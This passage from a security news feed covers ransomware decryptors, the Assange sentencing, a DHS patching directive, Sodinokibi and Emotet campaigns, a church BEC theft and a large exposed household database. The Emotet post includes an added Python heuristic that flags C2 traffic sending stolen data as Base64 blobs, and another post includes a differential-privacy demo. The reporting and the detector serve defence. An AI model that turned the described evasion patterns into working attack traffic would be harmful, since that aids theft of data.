The ransomware drops a ransom note named “{HELP__DECRYPT}.txt” on the victims’ machines; it includes payment instructions. Victims can contact the operators behind the ransomware by sending a message to the email address “w_decrypt24@qq.com”.

Below is the text of the ransom note:

“All of _our files are encr_pted* to decr_pt them write me to email::w_decrypt24@qq.com
Your key:
[redacted]”

ZQ ransomware

In order to decrypt the files, victims need to provide the decryptor with an encrypted file and its original, unencrypted copy. The decryptor tool is available at the following link:

https://www.emsisoft.com/decrypter/zq

Below is the step by step procedure:

  1. IMPORTANT! Make sure you remove the malware from your system first, otherwise it will repeatedly lock your system or encrypt files.
  2. Download the free Emsisoft Decrypter for ZQ.
  3. Run the executable and confirm the license agreement when asked.
  4. Click “Start” to decrypt your files. Note that this may take a while.
  5. All done! Gotta crypt ’em all!

Emsisoft has recently released several tools to help victims of other ransomware families, including the CryptoPokemon ransomware, the Planetary Ransomware, the Hacked Ransomware, and the PewDiePie ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor)

The post Victims of ZQ Ransomware can decrypt their files for free appeared first on Security Affairs.

Julian Assange sentenced to 50 weeks in jail

Julian Assange has been sentenced to 11 months in prison for breaching his bail conditions in 2012 and taking asylum in the Ecuadorian embassy for more than seven years.

WikiLeaks founder Julian Assange has been sentenced to 50 weeks in prison for breaching his bail conditions in 2012 and taking asylum in Ecuador’s London embassy for more than seven years.

In April 2018, WikiLeaks founder Julian Assange was arrested at the Ecuadorian Embassy in London after Ecuador withdrew his asylum after seven years.

Seven years ago, WikiLeaks founder Julian Assange took refuge in the embassy to avoid extradition to Sweden over a sexual assault case.

In 2012, a British judge ruled that WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the following years in its London embassy.

Julian Assange arrest
Wikileaks founder Julian Assange is arrested at the Ecuadorian embassy in London

Immediately after his arrest, Assange was convicted at Westminster Magistrates’ Court of skipping bail in June 2012 after the extradition order to Sweden.

In 2017, Sweden dropped the preliminary investigation into the rape accusation against Julian Assange, but the Wikileaks founder remained in the Ecuadorian Embassy fearing extradition to the United States.

Judge Deborah Taylor said that Assange’s conduct had cost 16 million pounds of British taxpayers’ money.

“Your continued residency has cost £16m of taxpayers’ money. No one is above the reach of the law.” said Judge Deborah Taylor while delivering the sentence at Southwark.

“It’s difficult to envisage a more serious example of this offence.”

“I have taken into account all that has been said on your behalf in mitigation, including the background history of this case which has been set out in some detail,” said HHJ Taylor as she summed up the case against Assange.

“Whilst you may have had fears as to what may happen to you, nonetheless you had a choice, and the course of action you chose was to commit this offence in the manner and with the features I have already outlined. In addition, I reject the suggestion that your voluntary residence in the Embassy should reduce any sentence. You were not living under prison conditions, and you could have left at any time to face due process with the rights and protections which the legal system in this country provides.”

Assange’s lawyer read a letter from him in court, in which he expressed his disappointment at the “terrifying circumstances”:

“I apologize unreservedly to those who consider that I have disrespected them by the way I have pursued my case. This is not what I wanted or intended,” Assange added.

Pierluigi Paganini

(SecurityAffairs – Julian Assange)

The post Julian Assange sentenced to 50 weeks in jail appeared first on Security Affairs.

DHS BOD 19-02 directive – Critical flaws must be fixed within 15 Days

The US DHS issued a new Binding Operational Directive (BOD 19-02) instructing federal agencies and departments to patch critical flaws within 15 days.

The U.S. Department of Homeland Security (DHS) issued a new Binding Operational Directive (BOD 19-02) ordering federal agencies and departments to quickly patch serious vulnerabilities in Internet-facing systems.

The BOD 19-02 gives government organizations 15 days to address critical vulnerabilities, while high-severity flaws must be fixed within 30 days.

“Review Cyber Hygiene reports issued by CISA and remediate the critical and high vulnerabilities detected on the agency’s Internet-accessible systems as follows:

  • Critical vulnerabilities must be remediated within 15 calendar days of initial detection.
  • High vulnerabilities must be remediated within 30 calendar days of initial detection.” reads the BOD.

BOD 19-02 replaces the previous 2015 BOD 15-01 (Critical Vulnerability Mitigation Requirement for Federal Civilian Executive Branch Departments and Agencies’ Internet-Accessible Systems) that gave the government agencies 30 days to address critical security holes.

DHS DNS hijacking

Government systems exposed online undergo Cyber Hygiene vulnerability assessments that help agencies identify flaws.

The Cybersecurity and Infrastructure Security Agency (CISA) provides regular reports to government agencies, informing them of the vulnerabilities detected during routine assessments.

The new BOD 19-02 also requires CISA to provide guidance for remediation and to share information on the detected flaws with the Office of Management and Budget (OMB) on a monthly basis. Information sharing is essential to profile threats and implement the necessary countermeasures.

“In support of BOD implementation, CISA leverages Cyber Hygiene scanning results to identify cross-government trends and persistent constraints, and works with the Office of Management and Budget (OMB) to help impacted agencies overcome technical and resource challenges that prevent the rapid remediation of vulnerabilities. ” reads the BOD 19-02.

Agencies that are not able to address the flaws within the timeframe established by BOD 19-02 have to submit a remediation plan within three days. The remediation plan includes a detailed report on the constraints that prevented the agency from addressing the flaws in time and, of course, an estimated completion date.

“The federal government must continue to enhance our security posture, reduce risks posed by vulnerable Internet-accessible systems, and build upon the success of BOD 15-01 by advancing federal requirements for high and critical vulnerability remediation to further reduce the attack surface and risk to federal agency information systems,” the DHS said.

The latest BOD 19-02 is a very important directive; however, we have to consider that 15 days is a very long time to wait before fixing flaws in government systems that manage critical processes and sensitive data.

Pierluigi Paganini

(SecurityAffairs – DHS, BOD 19-02)

The post DHS BOD 19-02 directive – Critical flaws must be fixed within 15 Days appeared first on Security Affairs.

MIVD Dutch intelligence warns of Russian, Chinese cyber espionage

The Dutch Military Intelligence and Security Service (MIVD) warns of “worrying” cyber espionage activities carried out by Russia and China.

The Military Intelligence and Security Service (MIVD) warns of “worrying” cyber espionage activities carried out by Russia and China.

The warning is included in the annual report published by the Dutch intelligence service, which cited as an example the attack against the world chemical weapons watchdog. In September 2018, Dutch intelligence services arrested two alleged Russian spies who were planning to hack a Swiss laboratory where an investigation into the poisoning of the spy Sergei Skripal was ongoing.

In April 2018 the Dutch authorities expelled four alleged agents from Russia’s GRU military intelligence agency for trying to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

According to the Military Intelligence and Security Service (MIVD), Russia is expanding its cyber capabilities, and Russia-linked APT groups are a threat to the Netherlands and to all European states.

MIVD

The AIVD sent a tweet indicating that an (official) English translation of the Annual Report 2018 will be released in a few weeks.

The popular cyber security researcher Matthijs Koot published an unofficial translation of the Annual Report 2018 of the Dutch General Intelligence and Security Service (GISS, known in Dutch as AIVD).

The report described the cyber espionage activities carried out by foreign governments as “very worrying,” Dutch news media outlets reported.

“The threat facing the armed forces is the theft of military technology and technological expertise, which can be used for both military and civil ends,”

“More and more countries are focusing on political and/or economic espionage. We see in our investigations that China, Iran and Russia are at the forefront of this. “

The way the Dutch intelligence services disclosed the information is unusual; in the past, counter-espionage operations were kept secret.

“That was necessary to increase the resilience of society, because less naivety means greater alertness to possible unwanted influences,” MIVD chief General Onno Eichelsheim said in the report.

The report pointed out that China was “actively attempting to gather military intelligence in the Netherlands”.

“The threat against defence is the stealing of military technological knowledge and technology that can be used both militarily and for civilian purposes.”

The Military Intelligence and Security Service (MIVD) also warns that Iran, North Korea, Pakistan and Syria were seeking “knowledge and goods” for their own weapons programmes in the Netherlands and other western countries.

Dutch intelligence is urging defence companies to reinforce their security to repel the growing threats.

Pierluigi Paganini

(SecurityAffairs – MIVD, intelligence)

The post MIVD Dutch intelligence warns of Russian, Chinese cyber espionage appeared first on Security Affairs.

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server developed by Oracle Corporation; it is used by numerous applications and enterprise web portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (e.g. South Korea’s EST Security and Cisco Talos), independent researchers, and intelligence groups.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos. “Attackers have been making use of this exploit in the wild since at least April 17.”

Sodinokibi ransomware

Crooks used PowerShell commands to download and execute malicious payloads; they demanded a ransom ranging from $1,500 worth of Bitcoin up to $2,500. The ransom doubles if the victims do not pay within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released the security patch, the experts started observing Sodinokibi ransomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continue the Talos researchers.

Experts discovered that CVE-2019-2725 has also been exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has likely been exploited in targeted attacks as well.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725,” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – Sodinokibi ransomware, WebLogic)

The post Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware appeared first on Security Affairs.

Vodafone discovered backdoors in Huawei equipment. But it was 2011 ..

Huawei has made the headlines again: Vodafone identified backdoors in software that could have handed Huawei unauthorized access to the carrier’s fixed-line network.

According to Bloomberg, Vodafone identified hidden backdoors in software that could have handed Huawei unauthorized access to the carrier’s fixed-line network in Italy, used to connect customers to the internet.

“Now Vodafone Group Plc has acknowledged to Bloomberg that it found vulnerabilities going back years with equipment supplied by Shenzhen-based Huawei for the carrier’s Italian business.” reads the blog post published by Bloomberg. “While Vodafone says the issues were resolved, the revelation may further damage the reputation of a major symbol of China’s global technology prowess.”

Wait a moment: the flaws in the Huawei technology were discovered by Vodafone a decade ago.

Bloomberg obtained Vodafone’s security briefing documents from 2009 and 2011 and spoke with people involved in the situation. The version provided by AFP is slightly different, because even though Vodafone confirmed the presence of the flaws, it is not true that the bugs could have allowed unauthorized access to Italy’s fixed-line network.

“Vodafone confirmed to AFP that the issues were resolved but stressed it was incorrect to suggest that the flaw could have allowed unauthorized access to Italy’s fixed-line network.” reported the AFP.

Bloomberg revealed that once it discovered the backdoors in home routers in 2011, Vodafone asked Huawei to address them. The Chinese firm told Vodafone that the issues were fixed, but according to Bloomberg further testing revealed that the vulnerabilities were not completely solved.

“Vodafone asked Huawei to remove backdoors in home internet routers in 2011 and received assurances from the supplier that the issues were fixed, but further testing revealed that the security vulnerabilities remained, the documents show.” continues Bloomberg. “Vodafone also identified backdoors in parts of its fixed-access network known as optical service nodes, which are responsible for transporting internet traffic over optical fibers, and other parts called broadband network gateways, which handle subscriber authentication and access to the internet, the people said.”

Bloomberg refers to the backdoor as unauthorized Telnet access to the Huawei equipment.

“The ‘backdoor’ that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet,” Vodafone said in an emailed statement.

“The issues were identified by independent security testing, initiated by Vodafone as part of our routine security measures, and fixed at the time by Huawei,” 

Huawei clarified that the flaws were discovered back in 2011 and 2012 and were quickly fixed.

“We were made aware of historical vulnerabilities in 2011 and 2012 and they were addressed at the time. Software vulnerabilities are an industry-wide challenge.” said Huawei.

Huawei explained it has “a well established public notification and patching process, and when a vulnerability is identified we work closely with our partners to take the appropriate corrective action”.

Huawei is at the center of a heated debate; many governments, led by the US, have banned the company from building 5G networks.

A few days ago, the British Government approved a limited role for Huawei in building the national 5G network in the country, ignoring security concerns from senior ministers.

Britain’s National Security Council approved a limited role for Huawei to help build “non-core” infrastructure such as antennas. Media reports said Prime Minister Theresa May had conditionally allowed Huawei to build the UK 5G network.

According to Bloomberg, Vodafone chief executive Nick Read “has joined peers in publicly opposing any bans on Huawei from 5G rollouts, warning of higher costs and delays”.

It is worth remembering that vulnerabilities are not hard to find in network equipment from almost any vendor, and in many cases they remain unfixed for a long time.

The cases reported by Bloomberg date back to 2011 and 2012; the one thing left to verify is whether Huawei addressed the flaws promptly after Vodafone reported them to the vendor.

Pierluigi Paganini

(SecurityAffairs – China, Vodafone)

The post Vodafone discovered backdoors in Huawei equipment. But it was 2011 .. appeared first on Security Affairs.

Norsk Hydro estimates March cyber attack cost at $50 Million

Aluminum producer Norsk Hydro estimated the cost of the massive cyber attack that hit the company in March at around $50 million.

How much does a security breach cost? The damage can be enormous: in 2017, the shipping giant Maersk announced it would incur losses of hundreds of millions of US dollars due to the NotPetya attack.

Back to the present: in mid-March, global aluminum producer Norsk Hydro was hit by a “massive” cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S.

The news of the attack had an immediate economic impact, with the share price dropping 2.0 percent in early trading on the Oslo Stock Exchange. Just one week after the ransomware attack, the company declared losses of more than $40 million.

The company postponed the publication of the quarterly earnings to June 5 because of the cyber attack.

Norsk Hydro

According to Norsk Hydro, the overall financial impact of the attack would be 400-450 million Norwegian krone ($46-52 million, 41-46 million euros).

“The cyber attack that hit us on March 19 has affected our entire global organization, with Extruded Solutions having suffered the most significant operational challenges and financial losses,” said President and CEO Svein Richard Brandtzæg. He added that the overall financial impact of the cyber attack is estimated at NOK 400-450 million in the first quarter.

The good news for investors is that the company has robust cyber insurance in place with recognized insurers.

The company did not pay any ransom and has filed a complaint with Norwegian police that is investigating the incident.

“The company’s shares dropped 1.65 percent in morning trading on the Oslo Stock Exchange,” AFP reported.

Pierluigi Paganini

(SecurityAffairs – Norsk Hydro, ransomware)

The post Norsk Hydro estimates March cyber attack cost at $50 Million appeared first on Security Affairs.

Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack

Crooks have stolen $1.75 million in a BEC (Business Email Compromise) attack against a church; the victim is the Saint Ambrose Catholic Parish.

Cybercriminals have stolen $1.75 million in a BEC (Business Email Compromise) attack against the Saint Ambrose Catholic Parish.

Saint Ambrose is the second largest church in the Diocese of Cleveland and the largest church in Brunswick, Ohio.

The Saint Ambrose Catholic Parish discovered the BEC attack on April 17, when it learned that payments for its Vision 2020 project had never reached the contractor (Marous Brothers Construction).

According to the investigation conducted by the FBI and Brunswick police, hackers broke into the parish’s email system, likely via a phishing attack. Using the compromised accounts, the attackers tricked the staff into believing that the contractor had changed its bank, and had the funds wired to a new account under the attackers' control.

BEC

In a letter to the parish, Fr. Bob Stec explained that he was contacted by the contractor, which informed him that it had not received the payments for the past two months.

“On Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months totaling approximately $1,750,000.” reads a letter sent to parish by Pastor Father Bob Stec.

“This was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.”

According to Stec, the crooks accessed two St. Ambrose employees’ email accounts. The attackers compromised only the email system; they did not access the parish database, which is stored in a secure cloud-based system.

“We are working closely with the Diocese and its insurance program to file a claim in the hopes that Marous Brothers Construction can receive their payment quickly and we can bring this important project for our parish to a positive completion,” Stec said in the letter.

The parish submitted an insurance claim in an attempt to recover the stolen money.

“At the same time, we brought in information technology consultants to review the security and stability of our system, change all passwords, and verify the integrity of our databases and other pertinent information.” Stec added. “They have determined the breach was limited to only two email accounts.”

BEC attacks represent a serious threat for businesses: according to the recently released 2018 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3), BEC scams caused over $1.2 billion in adjusted losses.

“In 2018, the IC3 received 20,373 BEC/E-mail Account Compromise (EAC) complaints with adjusted losses of over $1.2 billion” reads the report.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack appeared first on Security Affairs.

Facebook funds research on the impact of social media on elections

Facebook is going to fund academic research on the impact of social media on elections, aimed at preventing manipulation of these platforms.

Facebook is committed to preventing manipulation of elections through social media by funding research on the impact of social media on elections.

Facebook announced the involvement of 60 researchers from 30 academic institutions across 11 countries that were selected by the Social Science Research Council and the independent group Social Science One.

The research program began in 2018 following revelations about interference in the 2016 US election and the Brexit vote, and this week the social network giant revealed its first grants.

“We hope this initiative will deepen public understanding of the role social media has on elections and democracy and help Facebook and other companies improve their products and practices.” reads a blog post by Facebook executives Elliot Schrage and Chaya Nayak. “This initiative will deepen our work with universities around the world as we continue to improve our ability to address current threats and anticipate new ones.”

Over the past months, Facebook has been building a data sharing infrastructure to provide researchers with access to Facebook data in a secure way while preserving users’ privacy.

Facebook is also testing the application of differential privacy, which adds statistical noise to raw data sets to prevent the identification of an individual. The platform also limits the number of queries a researcher can run, to prevent the noise from being averaged away through repeated queries.
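The two controls mentioned, noise on query results and a cap on how many queries an analyst may run, are the core of a differentially private query interface. The following is an added example of both in their simplest form; it is not Facebook's implementation, which the post does not describe, and the sample records are constructed. Each counting query is answered with Laplace noise of scale 1/epsilon (a count has sensitivity 1, since adding or removing one person changes it by at most 1), and every query is charged against a total epsilon budget and a query counter, so that an analyst cannot isolate a single person by issuing two queries that differ by one record.

```python
import math
import random

# Constructed sample records (not Facebook data): one row per user.
SAMPLE_RECORDS = [
    {"country": "US", "age": 34, "saw_political_ad": True},
    {"country": "US", "age": 52, "saw_political_ad": False},
    {"country": "GB", "age": 29, "saw_political_ad": True},
    {"country": "US", "age": 41, "saw_political_ad": True},
    {"country": "DE", "age": 63, "saw_political_ad": False},
]


class PrivateQueryInterface:
    """Counting queries over records, answered with Laplace noise, charged
    against a total epsilon budget and capped at a number of queries."""

    def __init__(self, records, total_epsilon, max_queries, rng=None):
        self._records = list(records)
        self.remaining_epsilon = float(total_epsilon)
        self.remaining_queries = int(max_queries)
        self._rng = rng or random.Random()

    def _laplace(self, scale):
        # Inverse-CDF sampling of Laplace(0, scale).
        u = self._rng.random() - 0.5          # in [-0.5, 0.5)
        while u <= -0.5:                      # avoid log(0) on the rare exact edge
            u = self._rng.random() - 0.5
        return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))

    def count(self, predicate, epsilon):
        if self.remaining_queries <= 0:
            raise PermissionError("query limit reached")
        if epsilon <= 0 or epsilon > self.remaining_epsilon + 1e-12:
            raise PermissionError("privacy budget exhausted")
        self.remaining_queries -= 1
        self.remaining_epsilon -= epsilon
        true_count = sum(1 for r in self._records if predicate(r))
        # Sensitivity of a count is 1, so the Laplace scale is 1/epsilon.
        return true_count + self._laplace(1.0 / epsilon)


def mean_laplace_noise(n, scale, seed):
    """Average of n Laplace samples: close to 0, i.e. the noise is unbiased."""
    q = PrivateQueryInterface([], 0.0, 0, rng=random.Random(seed))
    return sum(q._laplace(scale) for _ in range(n)) / n


def run_demo(seed=7):
    """Two queries within budget, then a third that the interface refuses."""
    q = PrivateQueryInterface(SAMPLE_RECORDS, total_epsilon=1.0, max_queries=10,
                              rng=random.Random(seed))
    us = q.count(lambda r: r["country"] == "US", epsilon=0.5)
    ads = q.count(lambda r: r["saw_political_ad"], epsilon=0.5)
    try:
        q.count(lambda r: r["age"] > 60, epsilon=0.1)  # would single out one person
        refused = None
    except PermissionError as e:
        refused = str(e)
    return {"us_noisy": us, "ads_noisy": ads,
            "remaining_epsilon": q.remaining_epsilon, "refused": refused}


if __name__ == "__main__":
    print(run_demo())
```

With a budget of 1.0 spent as 0.5 + 0.5, the third query is refused regardless of how harmless it looks; that refusal, not the noise alone, is what stops the differencing attack, since averaging many noisy answers to the same question would otherwise recover the true count.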

“The urgency of this research cannot be overstated,” Social Science One wrote in a press release. “Concerns about disinformation, polarization, political advertising, and the role of platforms in the information ecosystem have not diminished. If anything, they have heightened.”

Pierluigi Paganini

(SecurityAffairs – Facebook, elections)

The post Facebook funds research on the impact of social media on elections appeared first on Security Affairs.

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, cyber criminals have stolen further funds, bringing the total to USD $4.6 million, but the most concerning aspect of the story is that the botnet they use continues to grow. On April 24 the botnet counted fewer than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts already monitored two malware campaigns respectively leveraging the RIG exploit kit and the Smoke Loader to deliver the ElectrumDoSMiner.

Malwarebytes also detected a previously undocumented loader, tracked as Trojan.BeamWinHTTP, that was used by crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the above loaders they discovered.

Most of the ElectrumDoSMiner infections were observed in the Asia-Pacific region (APAC), Brazil and Peru.

ElectrumDoSMiner

“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

United Airlines covers up seat cameras to respond to privacy concerns

United Airlines opted to cover every camera in entertainment systems embedded within the back of plane seats in response to privacy concerns.

Some of the seat-back screens and entertainment systems on United Airlines planes include a camera pointed at the passenger.

“A viral photo showing a camera in a Singapore Airlines in-flight TV display recently caused an uproar online.” reported BuzzFeed. “The image was retweeted hundreds of times, with many people expressing concern about the privacy implications. As it turns out, some seat-back screens in American Airlines’ premium economy class have them, too.”

In response to the privacy concerns, the airline decided to cover every camera in its entertainment systems, but pointed out that the cameras were never there to surveil passengers.

A company spokesman announced that the cameras will now be covered.

The company explained that the cameras could enable future business and entertainment applications (e.g. gaming, video conferencing).

“As with many other airlines, some of our premium seats have in-flight entertainment systems that came with cameras installed by the manufacturer.” reads a United Airlines spokesperson’s statement. “None of these cameras were ever activated and we had no plans to use them in the future, however we took the additional step to cover the cameras. The cameras are a standard feature that manufacturers of the system included for possible future purposes such as video conferencing.”

The company is covering the cameras with stickers, including on all new premium seats.

Singapore Airlines was recently criticized as well for cameras mounted beneath seat-back screens and pointing at passengers.

United Airlines 2

“These cameras on our newer IFE systems were provided by the original equipment manufacturers,” Singapore Airlines replied. “We have no plans to enable or develop any features using the cameras.”

Passengers and experts fear that facial recognition technology will be widely adopted in commercial aviation, for example to monitor individuals during boarding.

Pierluigi Paganini

(SecurityAffairs – United Airlines, privacy)

The post United Airlines covers up seat cameras to respond to privacy concerns appeared first on Security Affairs.

New Emotet variant uses connected devices as proxy C2 servers

Researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Trend Micro discovered a new variant of the Emotet Trojan that is able to infect devices and use them as proxy command-and-control servers. The new variant also employs random URI directory paths to evade network-based detection rules.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions. ” reads the analysis published by Trend Micro. “It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection. “

The experts also noticed that the threat actors behind the latest Emotet campaign are actively attempting to compromise IoT devices, including routers, IP cameras and webcams, and recruit them as the first layer of the C2 infrastructure.

The compromised devices could be used by threat actors for other malicious purposes.

Emotet is delivered via spam campaigns; one of the attacks monitored in early April leveraged the Powload trojan downloader to drop the threat. The spam emails carry a password-protected ZIP file, with the four-digit password included in the email body. The archive contains Powload variants that use PowerShell to download the final Emotet executable.

Emotet 1

Since March 15, experts have monitored Emotet samples using the new post-infection traffic and discovered that they also use randomly generated URI directory paths in their POST requests to evade network-based detection.

The new Emotet version sends the stolen information in the HTTP POST message body, instead of in the Cookie header as earlier versions did. Like previous versions, it encrypts the data with AES and an RSA key, and Base64-encodes the result.
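The traffic change described above is what a network-detection rule has to follow: the older pattern, a Base64 blob riding in the Cookie header, and the newer one, a Base64 blob in the POST body under a path made of random-looking segments. The following is an added example written for this page, not Trend Micro's detection logic; the sample requests are constructed, and the "generated segment" heuristic (alphanumeric segments that switch often between upper case, lower case and digits) is an assumption of the example rather than anything the report states. Encoded data in the body or cookie is required for a hit; a random path alone only adds a reason.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_base64(text, min_len=32):
    """True for a bare base64 blob of at least min_len chars that decodes cleanly."""
    text = text.strip()
    if len(text) < min_len or len(text) % 4 or not B64_RE.match(text):
        return False
    try:
        base64.b64decode(text, validate=True)
    except binascii.Error:
        return False
    return True


def is_random_token(segment, min_len=4):
    """Heuristic (an assumption of this example): generated path segments such as
    'Nd6kSbb' switch often between upper case, lower case and digits; real
    segments such as 'index', 'login' or 'api' do not."""
    if len(segment) < min_len or not segment.isalnum():
        return False

    def cls(c):
        return "d" if c.isdigit() else ("u" if c.isupper() else "l")

    classes = [cls(c) for c in segment]
    switches = sum(1 for a, b in zip(classes, classes[1:]) if a != b)
    return switches / (len(segment) - 1) >= 0.4


def classify_request(req):
    """req: {'method', 'path', 'headers': {...}, 'body': str}.
    Returns the reasons the request matches the post-infection pattern."""
    reasons = []
    if req["method"].upper() != "POST":
        return reasons
    segments = [s for s in req["path"].split("?")[0].split("/") if s]
    if segments and all(is_random_token(s) for s in segments):
        reasons.append("all URI path segments look generated")
    for part in req["headers"].get("Cookie", "").split(";"):
        _, _, value = part.strip().partition("=")
        if looks_base64(value):
            reasons.append("base64 blob carried in Cookie header")  # older pattern
            break
    if looks_base64(req["body"]):
        reasons.append("POST body is a bare base64 blob")            # newer pattern
    # A random path alone is weak evidence; require encoded data somewhere.
    return [] if reasons == ["all URI path segments look generated"] else reasons


def scan(requests):
    """Index and reasons for every flagged request."""
    flagged = []
    for i, req in enumerate(requests):
        reasons = classify_request(req)
        if reasons:
            flagged.append((i, reasons))
    return flagged


# Constructed sample traffic. The blob stands in for the AES/RSA-encrypted payload.
BLOB = base64.b64encode(bytes(range(64))).decode()
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/Nd6kSbb/ZkY2oqm2Rc/",
     "headers": {"Host": "203.0.113.24"}, "body": BLOB},               # new pattern
    {"method": "POST", "path": "/",
     "headers": {"Host": "198.51.100.9", "Cookie": "17dF=" + BLOB}, "body": ""},  # old pattern
    {"method": "POST", "path": "/api/v1/login",
     "headers": {"Host": "intranet.example"}, "body": "username=alice&password=s3cret"},
    {"method": "GET", "path": "/images/logo.png",
     "headers": {"Host": "www.example"}, "body": ""},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_REQUESTS):
        print(index, SAMPLE_REQUESTS[index]["path"], reasons)
```

Because the real payload is encrypted before encoding, content inspection cannot do better than "opaque blob"; the useful signal is the combination of shape (bare Base64), placement (body or cookie) and the generated path, which is why the example scores them together rather than matching any fixed string.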

Emotet traffic

“The change in POST-infection traffic and the use of these connected devices show that Emotet is still a constantly evolving and resilient threat.” concludes Trend Micro.

“The malware authors are fine-tuning evasion techniques and trying to adapt to security solutions. If left unchecked and undetected, this threat may lead to a substantial loss of money and data for businesses.”

Pierluigi Paganini

(SecurityAffairs – cybercrime, malware)

The post New Emotet variant uses connected devices as proxy C2 servers appeared first on Security Affairs.

Report: Unknown Data Breach Exposes 80 Million US Households

vpnMentor’s research team discovered an unprotected database exposing data on 80 million US households, and it is still actively leaking data.

Known hacktivists Noam Rotem and Ran Locar discovered an unprotected database impacting up to 65% of US households.

Hosted on a Microsoft cloud server, the 24 GB database includes the number of people living in each household along with their full names, marital status, income bracket, age, and more.

Information Included in the Database

Below is a screenshot of a typical entry from this database:

The database seems to itemize households rather than individuals. It includes:

  • Full addresses, including street addresses, cities, counties, states, and zip codes
  • Exact longitude and latitude
  • Full names, including first, last, and middle initial
  • Age
  • Date of birth

Some information is included but coded (given what we assume to be an internally-assigned numerical value). This includes:

  • Title
  • Gender
  • Marital status
  • Income
  • Homeowner status
  • Dwelling type

The only real hint that this database belongs to some kind of service is that “member_code” and “score” each appear in every entry.

The Danger of Exposing this Information

This isn’t the first time a huge database has been breached. However, we believe that it is the first time a breach of this size has included peoples’ names, addresses, and income.

This open database is a goldmine for identity thieves and other attackers. Here’s how:

Cyber Attacks

Access to your full name can help hackers guess your email address. Many people use name.familyname@gmail.com as their email address. While this makes sense, it also makes you easy to identify.  

Phishing can deliver many payloads, and ransomware is one of the most dangerous: a malicious link or attachment in an email infects the computer and encrypts its files. Without backups, victims are often left with paying the ransom as their only route to recovery, and with access to your income information, attackers know how much they can demand of you.

Real World Dangers

Your name and city are enough to run a comprehensive internet search. Google will bring up links to anything with your name, including: company websites, personal blogs or websites, social media profiles like Facebook, Instagram, and Twitter, and local media you may be featured in.

Let’s assume you haven’t updated the security settings on your Facebook profile for a while, so your posts are visible to people you’re not friends with. Everything you post is open to the internet – including the vacation photos you uploaded that morning. The geotag shows that you’re thousands of miles away from home.

Since your full address is in the database too, the thief not only knows where you live, they also now know that you’re far away from home so the house is probably empty. They can also see your income, so can approximate the value of your home contents. You just became a prime target for attack.

It gets worse: your age is in the database too. Attackers – both on and offline – can identify the most vulnerable people, filter them by income, and use the information in the database to confidently attack and exploit people by phone, email, or in person.

